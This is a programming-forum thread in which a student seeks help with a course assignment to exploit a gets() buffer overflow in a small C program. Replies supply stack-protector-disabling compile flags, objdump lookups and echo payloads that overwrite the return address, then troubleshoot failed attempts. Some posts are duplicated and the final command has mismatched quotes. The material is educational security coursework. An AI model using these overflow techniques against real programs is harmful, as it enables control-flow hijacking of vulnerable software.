- Forum
- UNIX/Linux Programming
- Buffer overflow attack
Buffer overflow attack
Hi i am doing a an assignment and was wondering if anyone can walk me through of doing this.
Implement a buffer overflow attack on the program below, isThisGood.c, by exploiting the input, see gets(). You do NOT modify the program below, instead craft a malicious input that causes a successful exploit. Successful exploit invokes the function, oopsIGotToTheBadFunction, though this function is NOT explicitly called in isThisGood.c!
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf ("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput (void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput ();
printf("Overflow failed\n");
return(1);
}
Implement a buffer overflow attack on the program below, isThisGood.c, by exploiting the input, see gets(). You do NOT modify the program below, instead craft a malicious input that causes a successful exploit. Successful exploit invokes the function, oopsIGotToTheBadFunction, though this function is NOT explicitly called in isThisGood.c!
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf ("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput (void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput ();
printf("Overflow failed\n");
return(1);
}
Last edited on
I'm no expert, but I guess it's a matter of overwriting the return address in good_function's stack frame with bad_function's address.
That implies that you would run the program in a slightly modified form that prints the address of bad_function. That is not the program you would attack, though. It's just for information. You attack the original program (presumably running on a website somewhere in actual practice).
Assuming that the OS is not randomizing the positioning of things -- which it really should be doing -- you could then encode that address, considering endianess, as hex character codes for input after 12 arbitrary characters to fill up the buffer and any other characters needed to get to the return address.
Are you running it on a system that doesn't randomize addresses (or have you turned it off)?
If this is happening then I don't know how you would do it:
https://en.wikipedia.org/wiki/Address_space_layout_randomization
That implies that you would run the program in a slightly modified form that prints the address of bad_function. That is not the program you would attack, though. It's just for information. You attack the original program (presumably running on a website somewhere in actual practice).
Assuming that the OS is not randomizing the positioning of things -- which it really should be doing -- you could then encode that address, considering endianess, as hex character codes for input after 12 arbitrary characters to fill up the buffer and any other characters needed to get to the return address.
Are you running it on a system that doesn't randomize addresses (or have you turned it off)?
If this is happening then I don't know how you would do it:
https://en.wikipedia.org/wiki/Address_space_layout_randomization
Last edited on
I was able to execute bad_function like this (the address is the one that worked for me; see below):
I compiled it like this. In particular, the stack protector needs to be turned off (the stack protector writes some random info between the local variable data and the return value and checks if it's been altered in which case it aborts the program):
I found the address of bad_function using objdump:
I needed to encode it backwards (little endian) in the echo string since my system (and likely yours) is little endian.
I determined how many characters were needed in front of the address by printing 8-byte chunks as addresses (unsigned longs, actually) near buf to find a good candidate (seemed to be an address in main, whose start address you can find with objdump).
echo -e "012345670123456701234567\xb6\x05\x40\x00\x00\x00\x00\x00" | ./overflow |
I compiled it like this. In particular, the stack protector needs to be turned off (the stack protector writes some random info between the local variable data and the return value and checks if it's been altered in which case it aborts the program):
gcc -std=c99 -Wno-deprecated-declarations -fno-stack-protector -o overflow overflow.c |
I found the address of bad_function using objdump:
objdump -t overflow | grep bad_function |
I needed to encode it backwards (little endian) in the echo string since my system (and likely yours) is little endian.
I determined how many characters were needed in front of the address by printing 8-byte chunks as addresses (unsigned longs, actually) near buf to find a good candidate (seemed to be an address in main, whose start address you can find with objdump).
|
|
Last edited on
Thanks for the reply dutch, I tried what you did but did not have success. Can you take a look at this output.
Do you see where I went wrong?
|
|
Do you see where I went wrong?
Last edited on
Your address is wrong. You have the last byte as b7 but objdump says b0.
And the exact position of the return address may be different for you, so you may need a different number of characters before the address. I used 24. You might need 16 or 32 or 40 (etc). That's what the little loop in good_function is for, finding a good candidate position. But maybe all you need is to fix that bad byte above.
And the exact position of the return address may be different for you, so you may need a different number of characters before the address. I used 24. You might need 16 or 32 or 40 (etc). That's what the little loop in good_function is for, finding a good candidate position. But maybe all you need is to fix that bad byte above.
When i run it with the for loop this is what it prints
i'm not sure what to do with this information. Yet i fixed the b7 to b0. So when run it using 24 char I get this error:
Yet if i do 16 I get
32 and 40 give me bus errors as well. I do not know where to go from here. I'd love more help is possible. Thanks!
|
|
i'm not sure what to do with this information. Yet i fixed the b7 to b0. So when run it using 24 char I get this error:
|
|
Yet if i do 16 I get
|
|
32 and 40 give me bus errors as well. I do not know where to go from here. I'd love more help is possible. Thanks!
Run this program and post the results. (Make sure you compile it with -fno-stack-protector.)
Also post the results of the following:
EDIT: I have a feeling that 20 chars is the correct offset for you. Do an objdump to check the current location of the bad function and try a 20 char offset. (If not 20, than maybe 44 or 52.)
Also post the results of the following:
objdump -t isThisGood | grep mainobjdump -t isThisGood | grep oops |
|
EDIT: I have a feeling that 20 chars is the correct offset for you. Do an objdump to check the current location of the bad function and try a 20 char offset. (If not 20, than maybe 44 or 52.)
Last edited on
Ran the program here was the result:
44 char gives the
52 char gives the
|
|
44 char gives the
Bus error (core dumped)52 char gives the
Bus error (core dumped)
Last edited on
As I said initially, I'm no expert. And I'm pretty much out of ideas.
It looks like buf+20 holds the return address back into main since main's address is 4008b0 and the value stored at buf+20 is 4008c4, which is clearly inside main.
What is the output of
What is the output of
You could maybe try a 32-bit version like this (I was assuming 64-bit since that's what objdump seems to show.)
It looks like buf+20 holds the return address back into main since main's address is 4008b0 and the value stored at buf+20 is 4008c4, which is clearly inside main.
What is the output of
type cc ?What is the output of
cc -v ?You could maybe try a 32-bit version like this (I was assuming 64-bit since that's what objdump seems to show.)
echo -e "01234567890123456789\xb0\x07\x40\x00" | ./isThisGood |
Last edited on
type cc
cc -v
trying echo -e "01234567890123456789\xb0\x07\x40\x00" | ./isThisGood
Here is another topic of the problem i found, but when i try that i get an error as well
http://www.cplusplus.com/forum/unices/218100/
Also found this link too : http://www.cplusplus.com/forum/beginner/148111/
cc is hashed (/usr/bin/cc)cc -v
|
|
trying echo -e "01234567890123456789\xb0\x07\x40\x00" | ./isThisGood
|
|
Here is another topic of the problem i found, but when i try that i get an error as well
http://www.cplusplus.com/forum/unices/218100/
|
|
Also found this link too : http://www.cplusplus.com/forum/beginner/148111/
Last edited on
It looks like the return address is definitely at buf+20, as suspected, and you are definitely compiling as 64-bits. In your last example your command should have been:
echo -e "12345678901234567890\x30\x08\x40\x00\x00\x00\x00\x00" | ./a.out |
Last edited on
just did that last example and changed the command to what you recommended and it gave me another bus error.
Is there another compiler i can try it on maybe that is the problem?
Do you think i have to turn off some system flags that prevent exploit attempts from getting through?
Is there another compiler i can try it on maybe that is the problem?
Do you think i have to turn off some system flags that prevent exploit attempts from getting through?
Last edited on
I have no idea. I'm sure there's some useful information in the difference between those "bus errors" and "segmentation faults".
What kind of system are you on? CPU? OS?
What kind of system are you on? CPU? OS?
From the output of cc -v we can see the following:
OS: freebsd11.1
CPU: x86_64
Compiler: clang 4.0.0
I have one more idea. Maybe it's blowing up because we are overwriting the value at buf+12 which is just before the return address (at buf+20). The value at buf+12 is 0x00007fffffffeb80. Maybe if we also write that value it will work. So try the following: skip 12 bytes, write that new value, then write the return address we want (I'm assuming it's still 0x0000000000400830).
(If it doesn't work, check the value at buf+12 and make sure it hasn't changed, and also check the address of the bad function.)
OS: freebsd11.1
CPU: x86_64
Compiler: clang 4.0.0
I have one more idea. Maybe it's blowing up because we are overwriting the value at buf+12 which is just before the return address (at buf+20). The value at buf+12 is 0x00007fffffffeb80. Maybe if we also write that value it will work. So try the following: skip 12 bytes, write that new value, then write the return address we want (I'm assuming it's still 0x0000000000400830).
echo -e '123456789012\x80\xeb\xff\xff\xff\x7f\x00\x00\x30\x08\x40\x00\x00\x00\x00\x00" | ./a.out |
(If it doesn't work, check the value at buf+12 and make sure it hasn't changed, and also check the address of the bad function.)
Last edited on
Topic archived. No new replies allowed.